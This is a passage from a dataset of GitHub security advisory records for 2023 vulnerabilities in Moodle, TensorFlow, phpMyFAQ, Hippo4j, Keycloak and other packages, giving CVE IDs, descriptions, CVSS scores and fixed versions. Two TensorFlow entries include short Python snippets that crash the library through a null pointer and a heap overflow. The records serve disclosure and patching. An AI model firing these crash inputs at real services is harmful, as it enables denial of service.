{'cwe_ids': ['CWE-829'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T00:16:31Z', 'nvd_published_at': '2023-03-06T23:15:00Z'}
1.4.0
GHSA-wxmq-v9gx-75pg
2023-03-28T22:54:23Z
2023-03-23T21:30:18Z
null
['CVE-2023-28335']
Moodle vulnerable to Cross-site Request Forgery
The link to reset all templates of a database activity did not include the necessary token to prevent a CSRF risk.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28335'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/355556c05f4a6d9e223164eff820cd34eb70cc35'}, {'type': 'WEB', 'url': 'https://git.moodle.org/gw?p=moodle.git;a=commitdiff;h=355556c05f4a6d9e223164eff820cd34eb70cc35'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=445067'}]
{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T23:08:33Z', 'nvd_published_at': '2023-03-23T21:15:00Z'}
1.4.0
GHSA-r76w-3wwq-jv6v
2023-03-14T23:01:26Z
2023-03-07T00:30:24Z
null
['CVE-2023-27891']
Insufficient Session Expiration in pretix
rami.io pretix before 4.17.1 allows OAuth application authorization from a logged-out session. The fixed versions are 4.15.1, 4.16.1, and 4.17.1.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'pretix'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.17.0'}, {'fixed': '4.17.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'pretix'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.16.0'}, {'fixed': '4.16.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'pretix'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.15.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27891'}, {'type': 'PACKAGE', 'url': 'https://github.com/thufschmitt/pretix-nix'}, {'type': 'WEB', 'url': 'https://pretix.eu/about/en/blog/20230306-release-4171/'}]
{'cwe_ids': ['CWE-613'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-14T23:01:26Z', 'nvd_published_at': '2023-03-06T23:15:00Z'}
1.4.0
GHSA-r95w-7cpx-h5mx
2023-03-24T17:12:43Z
2023-03-21T06:30:17Z
null
['CVE-2023-1542']
Answer vulnerable to Business Logic Errors
Business Logic Errors in GitHub repository answerdev/answer prior to 1.0.6.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1542'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/4ca2429d190a6e614f5bbee1173c80a7cffcc568'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/d947417c-5a12-407a-9a2f-fa696f65126f'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-21T22:31:47Z', 'nvd_published_at': '2023-03-21T05:15:00Z'}
1.4.0
GHSA-vpqv-mqvc-pcx2
2023-03-16T18:35:11Z
2023-03-16T18:35:11Z
null
['CVE-2014-4920']
Reflective Cross-site Scripting Vulnerability in twitter-bootstrap-rails
The twitter-bootstrap-rails Gem for Rails contains a flaw that enables a reflected cross-site scripting (XSS) attack. This flaw exists because the bootstrap_flash helper method does not validate input when handling flash messages before returning it to users. This may allow a context-dependent attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server.
[]
[{'package': {'ecosystem': 'RubyGems', 'name': 'twitter-bootstrap-rails'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/twitter-bootstrap-rails/CVE-2014-4920.yml'}, {'type': 'WEB', 'url': 'https://nvisium.com/blog/2014/03/28/reflected-xss-vulnerability-in-twitter'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T18:35:11Z', 'nvd_published_at': None}
1.4.0
GHSA-64jg-wjww-7c5w
2023-03-27T21:58:55Z
2023-03-24T21:58:15Z
null
['CVE-2023-25663']
TensorFlow has Null Pointer Error in TensorArrayConcatV2
### Impact When ctx->step_containter() is a null ptr, the Lookup function will be executed with a null pointer. ```python import tensorflow as tf tf.raw_ops.TensorArrayConcatV2(handle=['a', 'b'], flow_in = 0.1, dtype=tf.int32, element_shape_except0=1) ``` ### Patches We have patched the issue in GitHub commit [239139d2ae6a81ae9ba499ad78b56d9b2931538a](https://github.com/tensorflow/tensorflow/commit/239139d2ae6a81ae9ba499ad78b56d9b2931538a). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1 ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by Yu Tian
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-64jg-wjww-7c5w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25663'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/239139d2ae6a81ae9ba499ad78b56d9b2931538a'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]
{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T21:58:15Z', 'nvd_published_at': '2023-03-25T00:15:00Z'}
1.4.0
GHSA-vfvj-3m3g-m532
2023-03-13T20:53:50Z
2023-03-13T20:53:50Z
null
['CVE-2023-27483']
fieldpath's Paved.SetValue allows growing arrays up to arbitrary sizes in crossplane-runtime
### Summary Fuzz testing on `crossplane/crossplane`, by Ada Logics and sponsored by the CNCF, identified input to a function in the `fieldpath` package that can cause an out of memory panic. Applications that use the `Paved` type's `SetValue` method with user provided input without proper validation might use excessive amounts of memory and cause an out of memory panic. ### Details In the `fieldpath` package, the `SetValue` method of the `Paved` type sets a value on the inner object according to the provided path, without validating it first. This allows setting values in slices at any specific index and the code will grow the target array up to the required size. The index is currently capped at max uint32 (4294967295) given how indexes are parsed, but that is still an unnecessarily large value. ### Workaround Users can parse and validate the path before passing it to the `SetValue` method of the `Paved` type, constraining the index size as deemed appropriate. ### Credits Disclosed by Ada Logics in a fuzzing audit sponsored by CNCF.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/crossplane/crossplane-runtime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.17.0'}, {'fixed': '0.19.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/crossplane/crossplane-runtime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.6.0'}, {'fixed': '0.16.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/crossplane/crossplane-runtime/security/advisories/GHSA-vfvj-3m3g-m532'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27483'}, {'type': 'WEB', 'url': 'https://github.com/crossplane/crossplane-runtime/commit/53508a9f4374604db140dd8ab2fa52276441e738'}, {'type': 'WEB', 'url': 'https://github.com/crossplane/crossplane-runtime/commit/f67177024d906aaf5e13ee7cd470b4e87a9fef40'}, {'type': 'PACKAGE', 'url': 'https://github.com/crossplane/crossplane-runtime'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1623'}]
{'cwe_ids': ['CWE-20', 'CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-13T20:53:50Z', 'nvd_published_at': '2023-03-09T21:15:00Z'}
1.4.0
GHSA-5c9c-6x87-f9vm
2023-06-06T01:53:37Z
2023-03-31T21:30:37Z
null
['CVE-2022-4899']
zstd vulnerable to buffer overrun
A vulnerability was found in zstd v1.4.10, where an attacker can supply an empty string as an argument to the command line tool to cause buffer overrun.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/facebook/zstd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'zstd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.4.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-4899'}, {'type': 'WEB', 'url': 'https://github.com/facebook/zstd/issues/3200'}, {'type': 'WEB', 'url': 'https://github.com/facebook/zstd/pull/3220'}, {'type': 'WEB', 'url': 'https://github.com/sergey-dryabzhinsky/python-zstd/commit/c8a619aebdbd6b838fbfef6e19325a70f631a4c6'}, {'type': 'PACKAGE', 'url': 'https://github.com/facebook/zstd'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/zstd/PYSEC-2023-121.yaml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/C63HAGVLQA6FJNDCHR7CNZZL6VSLILB2/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JEHRBBYYTPA4DETOM5XAKGCP37NUTLOA/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QYLDK6ODVC4LJSDULLX6Q2YHTFOWABCN/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230725-0005/'}]
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:53:37Z', 'nvd_published_at': '2023-03-31T20:15:00Z'}
1.4.0
GHSA-4p4m-5qp7-479x
2023-04-07T22:37:43Z
2023-03-31T03:30:31Z
null
['CVE-2023-1753']
phpMyFAQ has weak password requirements
Weak password requirements in GitHub repository thorsten/phpmyfaq prior to 3.1.12.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.12'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1753'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/f612a72494080e04947da7028340fee4493fe8a5'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/01d6ae23-3a8f-42a8-99f4-10246187d71b'}]
{'cwe_ids': ['CWE-521'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T22:43:05Z', 'nvd_published_at': '2023-03-31T01:15:00Z'}
1.4.0
GHSA-h855-6hph-v363
2023-03-31T22:43:40Z
2023-03-27T15:30:17Z
null
['CVE-2023-27096']
Hippo4j allows attacker to obtain sensitive info via ConfigVerifyController function of Tenant Management module
Insecure Permissions vulnerability found in OpenGoofy Hippo4j v.1.4.3 allows attacker to obtain sensitive information via the ConfigVerifyController function of the Tenant Management module.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'cn.hippo4j:hippo4j-all'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27096'}, {'type': 'WEB', 'url': 'https://github.com/opengoofy/hippo4j/issues/1060'}, {'type': 'PACKAGE', 'url': 'https://github.com/opengoofy/hippo4j'}]
{'cwe_ids': ['CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T22:43:40Z', 'nvd_published_at': '2023-03-27T14:15:00Z'}
1.4.0
GHSA-79jp-m64f-pgrc
2023-03-13T19:15:59Z
2023-03-07T00:30:26Z
null
['CVE-2021-36399']
Moodle Cross-site Scripting vulnerability
In Moodle, ID numbers displayed in the quiz override screens required additional sanitizing to prevent a stored XSS risk.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0-beta'}, {'fixed': '3.11.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0-beta'}, {'fixed': '3.10.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.8'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36399'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=424805'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:22:19Z', 'nvd_published_at': '2023-03-06T22:15:00Z'}
1.4.0
GHSA-32gr-4cq6-5w5q
2023-03-13T19:18:32Z
2023-03-01T18:02:28Z
null
['CVE-2023-26491']
rsshub vulnerable to Cross-site Scripting via unvalidated URL parameters
### Impact When the URL parameters contain certain special characters, it returns an error page that does not properly handle XSS vulnerabilities, allowing for the execution of arbitrary JavaScript code. Users who access the deliberately constructed URL are affected. ### Patches This vulnerability was fixed in version c910c4d28717fb860fbe064736641f379fab2c91. Please upgrade to this or a later version. ### Workarounds No.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'rsshub'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-master.c910c4d'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/DIYgod/RSSHub/security/advisories/GHSA-32gr-4cq6-5w5q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26491'}, {'type': 'WEB', 'url': 'https://github.com/DIYgod/RSSHub/commit/c910c4d28717fb860fbe064736641f379fab2c91'}, {'type': 'PACKAGE', 'url': 'https://github.com/DIYgod/RSSHub'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-01T18:02:28Z', 'nvd_published_at': '2023-03-03T23:15:00Z'}
1.4.0
GHSA-6hg6-5c2q-7rcr
2023-03-27T22:00:19Z
2023-03-24T21:58:04Z
null
['CVE-2023-25664']
TensorFlow has Heap-buffer-overflow in AvgPoolGrad
### Impact ```python import os os.environ['TF_ENABLE_ONEDNN_OPTS'] = '0' import tensorflow as tf print(tf.__version__) with tf.device("CPU"): ksize = [1, 40, 128, 1] strides = [1, 128, 128, 30] padding = "SAME" data_format = "NHWC" orig_input_shape = [11, 9, 78, 9] grad = tf.saturate_cast(tf.random.uniform([16, 16, 16, 16], minval=-128, maxval=129, dtype=tf.int64), dtype=tf.float32) res = tf.raw_ops.AvgPoolGrad( ksize=ksize, strides=strides, padding=padding, data_format=data_format, orig_input_shape=orig_input_shape, grad=grad, ) ``` ### Patches We have patched the issue in GitHub commit [ddaac2bdd099bec5d7923dea45276a7558217e5b](https://github.com/tensorflow/tensorflow/commit/ddaac2bdd099bec5d7923dea45276a7558217e5b). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1 ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by <evn@google.com>
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-6hg6-5c2q-7rcr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25664'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ddaac2bdd099bec5d7923dea45276a7558217e5b'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]
{'cwe_ids': ['CWE-120', 'CWE-122'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T21:58:04Z', 'nvd_published_at': '2023-03-25T00:15:00Z'}
1.4.0
GHSA-xg89-vvwp-9c27
2023-03-21T18:59:51Z
2023-03-16T03:30:16Z
null
['CVE-2023-27095']
Exposure of Sensitive Information in OpenGoofy Hippo4j
Insecure Permissions vulnerability found in OpenGoofy Hippo4j v.1.4.3 allows attacker toescalate privileges via the AddUser method of the UserController function in Tenant Management module.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'cn.hippo4j:hippo4j-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27095'}, {'type': 'WEB', 'url': 'https://github.com/opengoofy/hippo4j/issues/1061'}]
{'cwe_ids': ['CWE-200', 'CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T18:35:22Z', 'nvd_published_at': '2023-03-16T02:15:00Z'}
1.4.0
GHSA-vxhr-p2vp-7gf8
2023-03-13T15:32:36Z
2023-03-07T09:30:30Z
null
['CVE-2023-1239']
Answer vulnerable to Cross-site Scripting
Cross-site Scripting (XSS) - Reflected in GitHub repository answerdev/answer prior to 1.0.6.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1239'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/9870ed87fb24ed468aaf1e169c2d028e0f375106'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/3a22c609-d2d8-4613-815d-58f5990b8bd8'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:11:18Z', 'nvd_published_at': '2023-03-07T08:15:00Z'}
1.4.0
GHSA-fvx4-8h2x-gm9q
2023-03-27T22:13:33Z
2023-03-23T18:30:18Z
null
['CVE-2023-27094']
Hippo4j privilege escalation issue
An issue found in OpenGoofy Hippo4j v.1.4.3 allows attackers to escalate privileges via the ThreadPoolController of the tenant Management module.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'cn.hippo4j:hippo4j-all'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27094'}, {'type': 'WEB', 'url': 'https://github.com/opengoofy/hippo4j/issues/1059'}, {'type': 'PACKAGE', 'url': 'https://github.com/opengoofy/hippo4j'}, {'type': 'WEB', 'url': 'https://github.com/opengoofy/hippo4j/blob/develop/hippo4j-server/hippo4j-console/src/main/java/cn/hippo4j/console/controller/ThreadPoolController.java'}]
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T19:48:52Z', 'nvd_published_at': '2023-03-23T17:15:00Z'}
1.4.0
GHSA-m4fv-gm5m-4725
2023-04-10T16:25:41Z
2023-03-01T17:58:01Z
null
['CVE-2022-1274']
HTML Injection in Keycloak Admin REST API
The `execute-actions-email` endpoint of the Keycloak Admin REST API allows a malicious actor to send emails containing phishing links to Keycloak users.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-services'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20.0.5'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/security/advisories/GHSA-m4fv-gm5m-4725'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-1274'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/pull/16764'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/commit/fc3c61235fa30132123c17ed8702ff7b3a672fe9'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2073157'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-01T17:58:01Z', 'nvd_published_at': '2023-03-29T21:15:00Z'}
1.4.0
GHSA-7x96-2w32-w3gw
2023-03-30T22:17:00Z
2023-03-23T21:30:19Z
null
['CVE-2022-3101']
tripleo-ansible may disclose important configuration details from an OpenStack deployment
A flaw was found in tripleo-ansible. Due to an insecure default configuration, the permissions of a sensitive file are not sufficiently restricted. This flaw allows a local attacker to use brute force to explore the relevant directory and discover the file, leading to information disclosure of important configuration details from the OpenStack deployment.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'tripleo-ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.0.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-3101'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2022-3101'}, {'type': 'PACKAGE', 'url': 'https://github.com/openstack/tripleo-ansible'}]
{'cwe_ids': ['CWE-22', 'CWE-276', 'CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T23:12:17Z', 'nvd_published_at': '2023-03-23T21:15:00Z'}
1.4.0
GHSA-p2pf-g8cq-3gq5
2023-03-10T15:31:39Z
2023-03-01T20:37:23Z
null
['CVE-2023-26047']
teler-waf contains detection rule bypass via Entities payload
### Description teler-waf is a Go HTTP middleware that provides teler IDS functionality to protect against web-based attacks. teler-waf prior to version v0.2.0 is vulnerable to a bypass attack when a specific case-sensitive hex entities payload with special characters such as CR/LF and horizontal tab is used. This vulnerability allows an attacker to execute arbitrary JavaScript code on the victim's browser and compromise the security of the web application. ### Impact An attacker can exploit this vulnerability to bypass common web attack threat rules in teler-waf and launch cross-site scripting (XSS) attacks. The attacker can execute arbitrary JavaScript code on the victim's browser and steal sensitive information, such as login credentials and session tokens, or take control of the victim's browser and perform malicious actions. ### Patches Version [v0.2.0](https://github.com/kitabisa/teler-waf/releases/tag/v0.2.0) includes a patch for this vulnerability. ### Workarounds We advised updating their installations to version v0.2.0 and frontwards immediately.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/kitabisa/teler-waf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/kitabisa/teler-waf/security/advisories/GHSA-p2pf-g8cq-3gq5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26047'}, {'type': 'WEB', 'url': 'https://github.com/dwisiswant0/cwa-filter-rules/commit/d818d1645832d1a02cd210c7680e692d2bf4313b'}, {'type': 'WEB', 'url': 'https://github.com/kitabisa/teler-waf/commit/6e1b0e19b8adc1bbc3513a986025d4adf88d59f8'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-p2pf-g8cq-3gq5'}, {'type': 'PACKAGE', 'url': 'https://github.com/kitabisa/teler-waf'}, {'type': 'WEB', 'url': 'https://github.com/kitabisa/teler-waf/compare/v0.1.2...v0.2.0'}, {'type': 'WEB', 'url': 'https://github.com/kitabisa/teler-waf/releases/tag/v0.2.0'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1600'}]
{'cwe_ids': ['CWE-692', 'CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-01T20:37:23Z', 'nvd_published_at': '2023-03-03T23:15:00Z'}
1.4.0
GHSA-gvg8-r8w2-9gfj
2023-04-26T20:34:32Z
2023-03-31T03:30:31Z
null
['CVE-2023-1754']
phpMyFAQ vulnerable to improper input validation
Improper Neutralization of Input During Web Page Generation in phpMyFAQ
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.12'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1754'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/d773df925cb74e874527458beed1f66f966ec491'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/529f2361-eb2e-476f-b7ef-4e561a712e28'}]
{'cwe_ids': ['CWE-20', 'CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T22:43:17Z', 'nvd_published_at': '2023-03-31T01:15:00Z'}
1.4.0
GHSA-4hc4-pgfx-3mrx
2023-03-17T21:38:36Z
2023-03-17T18:20:46Z
null
['CVE-2023-27593']
cilium-agent container can access the host via `hostPath` mount
